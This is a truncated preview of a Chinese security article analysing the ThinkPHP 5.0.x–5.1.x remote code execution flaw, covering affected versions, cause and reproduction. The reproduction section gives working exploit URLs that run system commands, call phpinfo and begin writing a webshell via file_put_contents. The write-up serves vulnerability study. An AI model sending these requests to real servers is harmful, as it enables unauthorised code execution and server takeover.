今天看啥  ›  专栏  ›  红队蓝军

ThinkPHP框架漏洞解析

红队蓝军  · 公众号  ·  · 2024-08-09 19:00

文章预览

ThinkPHP 5.x 远程代码执行漏洞-01 简介 漏洞名称:ThinkPHP 5.0.x-5.1.x 远程代码执行漏洞 影响范围:ThinkPHP v5.0.5 < 5.0.23,ThinkPHP v5.1.0  < 5.1.31 威胁等级:严重 漏洞类型:远程代码执行 由于ThinkPHP v5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接进行远程的代码执行,进而获得服务器权限。 复现 将TP框架的版本替换到对应的范围即可。这里用的是: 5.1.22 ThinkPHP框架的版本可用通过:$Think.version 在页码输出 命令执行 http://域名/index.php?s=index/\think\app/invokefunction & function =call_user_func_array [0]=system [1][]=whoami 拿探针 http://www.tp.com/index.php?s=/Index/\think\app/invokefunction & function =call_user_func_array [0]=phpinfo [1][]=-1 写shell http://www.tp.com/index.php?s=/index/\think\app/invokefunction & function =call_user_func_array [0]=file_put_contents [1][ ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览